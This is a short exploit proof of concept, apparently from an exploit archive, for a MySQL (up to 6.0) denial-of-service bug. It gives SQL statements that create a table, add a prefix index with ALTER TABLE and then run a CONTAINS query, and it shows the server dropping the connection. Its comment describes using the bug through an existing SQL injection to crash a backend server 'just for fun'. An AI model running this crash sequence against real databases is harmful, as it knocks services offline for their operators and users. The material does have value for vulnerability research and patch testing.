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/* * MySQL <=6.0 possibly affected * Kristian Erik Hermansen * Credit: Joe Gallo * You must have ALTER permissions to exploit this bug! * Scenario: You found SQL injection, but you want to punch backend server * in the nuts just for fun. Start with the ALTER TABLE statement on * a table and field you know to exist. The first two SQL statements are * simply to demostrate reproducibility... */
<snip> mysql> CREATE TABLE `test` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, `foo` text NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1; Query OK, 0 rows affected
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); Empty set
mysql> ALTER TABLE test ADD INDEX (foo(100)); Query OK, 0 rows affected Records: 0 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); ERROR 2013 : Lost connection to MySQL server during query </snip>
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